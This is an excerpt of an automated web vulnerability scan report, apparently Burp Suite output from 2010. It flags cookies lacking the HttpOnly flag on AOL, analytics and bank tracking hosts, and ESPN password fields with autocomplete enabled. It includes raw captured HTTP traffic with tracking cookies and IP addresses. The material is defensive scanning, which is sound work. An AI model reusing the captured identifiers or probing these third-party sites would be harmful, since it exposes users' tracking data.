HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT" Content-Type: application/x-javascript Content-Length: 109 Set-Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986;expires=Tue, 6 Nov 2012 6:11:28 GMT;domain=at.atwola.com;path=/
document.write("<!-- *\n"); document.write("AOL - HTML - Blank HTML Ad\n"); document.write("* -->\n");
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /vanity/?ts=1289110282906&h=www.aol.com&v=9&t=AOL.com%20-%20Welcome%20to%20AOL&r=http%3A%2F%2Fcreativeby2.unicast.com%2Fassets%2FA23%2FN1405%2FM9880%2FC337926%2FAOL_Orange_300x250_imu_swf.swf&l=0&ms=1&dL_ch=us.aolportal&ver=1&dL_dpt=newaol%20portal5%20AOL.com%20Main%2010x7&template=main&cobrand=portal5&plids=145774%7Centertainmentnews%7Ccwell%7C5%2C182420%7Cfinancenews-promo%7Ccwell%7C4%2C182732%7Cdl1%7Ccwell%7C1%2C101839%7Centertainmentnewsrss%7Ccwell%7C5%2C182599%7Centertainmentnews-promo%7Ccwell%7C5%2C182700%7Csportsnews-promo%7Ccwell%7C6%2C99763%7Cadhocbottomjs%7Crcol%7C9%2C182741%7Csportsnews%7Ccwell%7C6%2C182724%7Ctopnews-promo%7Ccwell%7C2%2C182659%7Cfinancenews%7Ccwell%7C4%2C182739%7Ctopnews%7Ccwell%7C2%2C181656%7Cprodsvcs%7Clcol%7C3 HTTP/1.1 Host: b.aol.com Proxy-Connection: keep-alive Referer: http://www.aol.com/?ncid=bannadusaolp00000044 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?rn=38922149&C1=2&C2=1000009&C4=http%3A%2F%2Fwww.aol.com%2F&C5=us.aolportal&C7=http%3A%2F%2Fwww.aol.com%2F&C8=AOL.com%20-%20Welcome%20to%20AOL HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.aol.com/?ncid=bannadusaolp00000044 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=cb1dc5-204.0.5.41-1286583196
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Sun, 07 Nov 2010 06:11:26 GMT Connection: close Set-Cookie: UID=cb1dc5-204.0.5.41-1286583196; expires=Tue, 06-Nov-2012 06:11:26 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /r?c2=3000005&d.c=gif&d.o=wdgespinternational&d.x=176193424&d.t=page&d.u=http%3A%2F%2Fwww.cricinfo.com%2Fci%2Fcontent%2Fpage%2F417881.html HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.cricinfo.com/ci/content/page/417881.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=cb1dc5-204.0.5.41-1286583196
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Sun, 07 Nov 2010 06:09:59 GMT Connection: close Set-Cookie: UID=cb1dc5-204.0.5.41-1286583196; expires=Tue, 06-Nov-2012 06:09:59 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The following cookie was issued by the application and does not have the HttpOnly flag set:
cluid=1881286022853182851; expires=Thu, 07 Nov 2030 07:10:39 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /in.php?site_id=226163&res=1920x1200&lang=en&secure=0&href=%2FReplica-Cricket-Kit%2F2009%2520England%2520Replica%2520Clothing.aspx&title=2009%20England%20Replica%20Clothing%20%3A%20cricshop.com&ref=&jsuid=1881286022853182851&mime=js&x=0.6341367335990071 HTTP/1.1 Host: in.getclicky.com Proxy-Connection: keep-alive Referer: http://www.cricshop.com/Replica-Cricket-Kit/2009%20England%20Replica%20Clothing.aspx Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 06:10:39 GMT Server: Apache X-Powered-By: PHP/4.4.4-8+etch6 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Mon, 26 Jul 1997 05:00:00 GMT Set-Cookie: cluid=1881286022853182851; expires=Thu, 07 Nov 2030 07:10:39 GMT; path=/ P3P: CP='NOI DSP COR CUR OUR NID NOR' Vary: Accept-Encoding Connection: close Content-Type: text/javascript Content-Length: 0
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi=[CS]v1|266B2188051D0EF9-6000012CE00A6B91[CE]; Expires=Tue, 6 Nov 2012 06:11:28 GMT; Domain=.aol.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/aolcommem,aolsvc/1/H.21/s28736884680110?AQB=1&ndh=1&t=7/10/2010%201%3A11%3A26%200%20300&ns=aolllc&cl=63072000&pageName=acm%20%3A%20newaol%20main5%20AOL.com%205.0%20Main&g=http%3A//www.aol.com/%3Fncid%3Dbannadusaolp00000044&r=http%3A//www.aol.com/%3Fncid%3Dbannadusaolp00000044&cc=USD&ch=us.aolportal&v0=bannadusaolp00000044&events=event10&c1=acm%20%3A%20newaol%20main5%20AOL.com%205.0%20Main&c2=acm%20%3A%20&c3=gmt_5&c10=external%20web%20browser&c12=http%3A//www.aol.com/&c13=non-authenticated&c14=www.aol.com&v14=acm%3A45&c15=unavailable&c16=no_location&c17=theme_default-prism_main5&v18=bannadusaolp00000044&v19=bannadusaolp00000044&c20=newaol%20main5%20AOL.com%205.0%20Main&c24=uaid_1.da09552aea3511df901a37c95ae35e4c.ca17&c49=H.21-May2010%7Cmmx_1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1128&bh=991&p=Google%20Gears%200.5.33.0%3BShockwave%20Flash%3BAdobe%20Acrobat%3BJava%20Deployment%20Toolkit%206.0.210.7%3BJava%28TM%29%20Platform%20SE%206%20U21%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: o.sa.aol.com Proxy-Connection: keep-alive Referer: http://www.aol.com/?ncid=bannadusaolp00000044 Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.da09552aea3511df901a37c95ae35e4c.ca17; CUNAUTHID=1.da09552aea3511df901a37c95ae35e4c.ca17; s_sess=%20s_eVar17%3DInitial%2520Engagement%3B%20s_eVar20%3Dbannadusaolp00000044%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B; s_pers=%20s_lastvisit%3D1289110284434%252Cbannadusaolp00000044%7C1296886284434%3B%20s_getnr%3D1289110286328-New%7C1352182286328%3B%20s_nrgvo%3DNew%7C1352182286333%3B
Response
HTTP/1.1 302 Found Date: Sun, 07 Nov 2010 06:11:28 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi=[CS]v1|266B2188051D0EF9-6000012CE00A6B91[CE]; Expires=Tue, 6 Nov 2012 06:11:28 GMT; Domain=.aol.com; Path=/ Location: http://o.sa.aol.com/b/ss/aolcommem,aolsvc/1/H.21/s28736884680110?AQB=1&pccr=true&vidn=266B2188051D0EF9-6000012CE00A6B91&&ndh=1&t=7/10/2010%201%3A11%3A26%200%20300&ns=aolllc&cl=63072000&pageName=acm%20%3A%20newaol%20main5%20AOL.com%205.0%20Main&g=http%3A//www.aol.com/%3Fncid%3Dbannadusaolp00000044&r=http%3A//www.aol.com/%3Fncid%3Dbannadusaolp00000044&cc=USD&ch=us.aolportal&v0=bannadusaolp00000044&events=event10&c1=acm%20%3A%20newaol%20main5%20AOL.com%205.0%20Main&c2=acm%20%3A%20&c3=gmt_5&c10=external%20web%20browser&c12=http%3A//www.aol.com/&c13=non-authenticated&c14=www.aol.com&v14=acm%3A45&c15=unavailable&c16=no_location&c17=theme_default-prism_main5&v18=bannadusaolp00000044&v19=bannadusaolp00000044&c20=newaol%20main5%20AOL.com%205.0%20Main&c24=uaid_1.da09552aea3511df901a37c95ae35e4c.ca17&c49=H.21-May2010%7Cmmx_1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1128&bh=991&p=Google%20Gears%200.5.33.0%3BShockwave%20Flash%3BAdobe%20Acrobat%3BJava%20Deployment%20Toolkit%206.0.210.7%3BJava%28TM%29%20Platform%20SE%206%20U21%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 X-C: ms-4.3 Expires: Sat, 06 Nov 2010 06:11:28 GMT Last-Modified: Mon, 08 Nov 2010 06:11:28 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www303 Content-Length: 0 Content-Type: text/plain
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi=[CS]v1|266B2187851D1483-60000138C02CAF48[CE]; Expires=Tue, 6 Nov 2012 06:11:27 GMT; Domain=.aol.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/aolcommem,aolsvc/1/H.21/s2959826072212?AQB=1&ndh=1&t=7/10/2010%201%3A11%3A24%200%20300&ns=aolllc&cl=63072000&pageName=acm%20%3A%20newaol%20portal5%20AOL.com%20Main%2010x7&g=http%3A//www.aol.com/%3Fncid%3Dbannadusaolp00000044&r=http%3A//creativeby2.unicast.com/assets/A23/N1405/M9880/C337926/AOL_Orange_300x250_imu_swf.swf&cc=USD&ch=us.aolportal&v0=bannadusaolp00000044&events=event10%2Cevent12&c1=acm%20%3A%20newaol%20portal5%20AOL.com%20Main%2010x7&c2=acm%20%3A%20&c3=gmt_5&c10=external%20web%20browser&c12=http%3A//www.aol.com/&c13=non-authenticated&c14=creativeby2.unicast.com&v14=acm%3Adp&c15=unavailable&c17=default-ace&v17=Initial%20Engagement&v18=bannadusaolp00000044&v19=bannadusaolp00000044&c20=newaol%20portal5%20AOL.com%20Main%2010x7&v20=bannadusaolp00000044&c24=uaid_na&c49=H.21-May2010%7Cmmx_1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1128&bh=991&p=Google%20Gears%200.5.33.0%3BShockwave%20Flash%3BAdobe%20Acrobat%3BJava%20Deployment%20Toolkit%206.0.210.7%3BJava%28TM%29%20Platform%20SE%206%20U21%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: o.sa.aol.com Proxy-Connection: keep-alive Referer: http://www.aol.com/?ncid=bannadusaolp00000044 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_eVar17%3DInitial%2520Engagement%3B%20s_eVar20%3Dbannadusaolp00000044%3B; s_pers=%20s_lastvisit%3D1289110284434%252Cbannadusaolp00000044%7C1296886284434%3B%20s_getnr%3D1289110284455-New%7C1352182284455%3B%20s_nrgvo%3DNew%7C1352182284460%3B
Response
HTTP/1.1 302 Found Date: Sun, 07 Nov 2010 06:11:27 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi=[CS]v1|266B2187851D1483-60000138C02CAF48[CE]; Expires=Tue, 6 Nov 2012 06:11:27 GMT; Domain=.aol.com; Path=/ Location: http://o.sa.aol.com/b/ss/aolcommem,aolsvc/1/H.21/s2959826072212?AQB=1&pccr=true&vidn=266B2187851D1483-60000138C02CAF48&&ndh=1&t=7/10/2010%201%3A11%3A24%200%20300&ns=aolllc&cl=63072000&pageName=acm%20%3A%20newaol%20portal5%20AOL.com%20Main%2010x7&g=http%3A//www.aol.com/%3Fncid%3Dbannadusaolp00000044&r=http%3A//creativeby2.unicast.com/assets/A23/N1405/M9880/C337926/AOL_Orange_300x250_imu_swf.swf&cc=USD&ch=us.aolportal&v0=bannadusaolp00000044&events=event10%2Cevent12&c1=acm%20%3A%20newaol%20portal5%20AOL.com%20Main%2010x7&c2=acm%20%3A%20&c3=gmt_5&c10=external%20web%20browser&c12=http%3A//www.aol.com/&c13=non-authenticated&c14=creativeby2.unicast.com&v14=acm%3Adp&c15=unavailable&c17=default-ace&v17=Initial%20Engagement&v18=bannadusaolp00000044&v19=bannadusaolp00000044&c20=newaol%20portal5%20AOL.com%20Main%2010x7&v20=bannadusaolp00000044&c24=uaid_na&c49=H.21-May2010%7Cmmx_1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1128&bh=991&p=Google%20Gears%200.5.33.0%3BShockwave%20Flash%3BAdobe%20Acrobat%3BJava%20Deployment%20Toolkit%206.0.210.7%3BJava%28TM%29%20Platform%20SE%206%20U21%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 X-C: ms-4.3 Expires: Sat, 06 Nov 2010 06:11:27 GMT Last-Modified: Mon, 08 Nov 2010 06:11:27 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www398 Content-Length: 0 Content-Type: text/plain
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dcs0wc0p0100008qxh3a7m16r_4b2y/dcs.gif?dcsredirect=1&dcsdat=1289110236853&dcssip=www.icicibankm2i.com&dcsuri=/lms_ct/m2iGLSCH/index.asp&dcsqry=%3FUserType=cricinfo_na_text_cpm&WT.tz=-5&WT.bh=1&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=ICICI%20Bank%20:%20Money2India&WT.js=Yes&WT.jv=1.5&WT.bs=1128x991&WT.fi=Yes&WT.fv=10.1&WT.co_f=260e0d9eb88234b9e371291036236856&WT.vt_f=1&WT.vt_f_a=1&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_sid=260e0d9eb88234b9e371291036236856.1291036236856 HTTP/1.1 Host: sdc.icicibank.com Proxy-Connection: keep-alive Referer: http://www.icicibankm2i.com/lms_ct/m2iGLSCH/index.asp?UserType=cricinfo_na_text_cpm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WEBTRENDS_ID=174.121.222.18-2139287584.30113346
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Last-Modified: Mon, 28 Jan 2002 04:21:42 GMT Accept-Ranges: bytes ETag: "0cfaa49b3a7c11:35d18" Server: Microsoft-IIS/6.0 Set-Cookie: ACOOKIE=C8ctADE3NC4xMjEuMjIyLjE4LTIxMzkyODc1ODQuMzAxMTMzNDYAAAAAAAABAAAAAQAAAN9C1kzfQtZMAQAAAAEAAADfQtZM30LWTAAAAAA-; path=/; expires=Wed, 04-Nov-2020 06:10:39 GMT P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Date: Sun, 07 Nov 2010 06:10:38 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dcs0wc0p0100008qxh3a7m16r_4b2y/dcs.gif?&dcsdat=1289110236853&dcssip=www.icicibankm2i.com&dcsuri=/lms_ct/m2iGLSCH/index.asp&dcsqry=%3FUserType=cricinfo_na_text_cpm&WT.tz=-5&WT.bh=1&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=ICICI%20Bank%20:%20Money2India&WT.js=Yes&WT.jv=1.5&WT.bs=1128x991&WT.fi=Yes&WT.fv=10.1&WT.co_f=260e0d9eb88234b9e371291036236856&WT.vt_f=1&WT.vt_f_a=1&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_sid=260e0d9eb88234b9e371291036236856.1291036236856 HTTP/1.1 Host: sdc.icicibank.com Proxy-Connection: keep-alive Referer: http://www.icicibankm2i.com/lms_ct/m2iGLSCH/index.asp?UserType=cricinfo_na_text_cpm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 303 Object Moved Connection: close Date: Sun, 07 Nov 2010 06:10:38 GMT Server: Microsoft-IIS/6.0 Location: /dcs0wc0p0100008qxh3a7m16r_4b2y/dcs.gif?dcsredirect=1&dcsdat=1289110236853&dcssip=www.icicibankm2i.com&dcsuri=/lms_ct/m2iGLSCH/index.asp&dcsqry=%3FUserType=cricinfo_na_text_cpm&WT.tz=-5&WT.bh=1&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=ICICI%20Bank%20:%20Money2India&WT.js=Yes&WT.jv=1.5&WT.bs=1128x991&WT.fi=Yes&WT.fv=10.1&WT.co_f=260e0d9eb88234b9e371291036236856&WT.vt_f=1&WT.vt_f_a=1&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_sid=260e0d9eb88234b9e371291036236856.1291036236856 Content-Length: 0 Set-Cookie: WEBTRENDS_ID=174.121.222.18-2139287584.30113346; expires=Wed, 04-Nov-2020 06:10:38 GMT; path=/dcs0wc0p0100008qxh3a7m16r_4b2y P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /?ncid=bannadusaolp00000044 HTTP/1.1 Host: www.aol.com Proxy-Connection: keep-alive Referer: http://creativeby2.unicast.com/assets/A23/N1405/M9880/C337926/AOL_Orange_300x250_imu_swf.swf Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pagead/aclk?sa=L&ai=ByUgxtB3WTJVHkcuxB_eflOAI-LTS4gGQ16uyEdisz40JABABGAEgADgBUIDH4cQEYMmG7YiEpOwPggEXY2EtcHViLTE3MzUwMzQ1MjA0MDE4NzigAa7w5_QDsgEQd3d3LmNyaWNpbmZvLmNvbboBCjMwMHgyNTBfYXPIAQnaATtodHRwOi8vd3d3LmNyaWNrZXQub3JnL2NpL2NvbnRlbnQvY3VycmVudC9zdG9yeS8yOTc2NTUuaHRtbJgChAfAAgHIAqy40QqoAwHoA6gC6APSJ-gDtQj1AwAAAEQ&num=1&client=ca-pub-1735034520401878&val=CgdPUFRfT1VUEAAaCKSYyMM96rs1IAEoAQ&sig=AGiWqtxN2e598V902Pt7t-bkIwSpDpiegQ&adurl=http://www.yourlexusdealer.com/Houston/index.html%3Fmodel%3DRX HTTP/1.1 Host: www.googleadservices.com Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1881526/PID_1406156_RX_300x250.swf Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /lexus-share/css/lexus_3_5.css HTTP/1.1 Host: www.lexus.com Proxy-Connection: keep-alive Referer: http://www.yourlexusdealer.com/Houston/index.html?model=RX Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Tue, 19 Oct 2010 18:50:21 GMT ETag: "244ed-1dd62-c3c93540" Accept-Ranges: bytes Content-Type: text/css Cache-Control: max-age=147604 Expires: Mon, 08 Nov 2010 23:10:20 GMT Date: Sun, 07 Nov 2010 06:10:16 GMT Connection: close Vary: Accept-Encoding Set-Cookie: Apache=64.211.162.79.120911289110216996; expires=Wed, 22-Aug-2012 17:30:00 GMT; path=/ Content-Length: 122210
/* This is a generated file. Do not edit. Edit the individual js files and regenerate the home page. */ /*====styleGlobal.css - GLOBAL DEFAULTS ====*/
/*body*/ body { margin: 0; padding: 0; ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /lexus-share/js/lexus_3_5.js HTTP/1.1 Host: www.lexus.com Proxy-Connection: keep-alive Referer: http://www.yourlexusdealer.com/Houston/index.html?model=RX Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Tue, 05 Oct 2010 17:53:46 GMT ETag: "227b8-64f3f-57a65e80" Accept-Ranges: bytes Content-Type: application/x-javascript Cache-Control: max-age=147699 Expires: Mon, 08 Nov 2010 23:11:55 GMT Date: Sun, 07 Nov 2010 06:10:16 GMT Connection: close Vary: Accept-Encoding Set-Cookie: Apache=64.211.162.79.120911289110216997; expires=Wed, 22-Aug-2012 17:30:00 GMT; path=/ Content-Length: 413503
/* This is a generated file. Do not edit. Edit the individual js files and regenerate the home page. */ /* Prototype JavaScript framework, version 1.4.0 * (c) 2005 Sam Stephenson <sam@conio.ne ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Houston/index.html?model=RX HTTP/1.1 Host: www.yourlexusdealer.com Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1881526/PID_1406156_RX_300x250.swf Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Thu, 28 Oct 2010 19:11:32 GMT ETag: "5e0cf-28df-1c1d8100" Accept-Ranges: bytes Content-Type: text/html Cache-Control: max-age=259180 Expires: Wed, 10 Nov 2010 06:09:53 GMT Date: Sun, 07 Nov 2010 06:10:13 GMT Connection: close Vary: Accept-Encoding Set-Cookie: Apache=64.211.162.86.122751289110213656; expires=Wed, 22-Aug-2012 17:30:00 GMT; path=/ Content-Length: 10463
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8"> <title>Hous ...[SNIP]...
11. Password field with autocomplete enabledpreviousnext There are 10 instances of this issue:
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The page contains a form with the following action URL:
http://espn.go.com/espn3/index
The form contains the following password field with autocomplete enabled:
password
Request
GET /espn3/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sun, 07 Nov 2010 05:45:02 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sun, 07 Nov 2010 05:37:57 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN05 Cache-Expires: Sun, 07 Nov 2010 05:46:35 GMT Content-Length: 772933 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
The page contains a form with the following action URL:
http://espn.go.com/espn3/index/_/sport/basketball
The form contains the following password field with autocomplete enabled:
password
Request
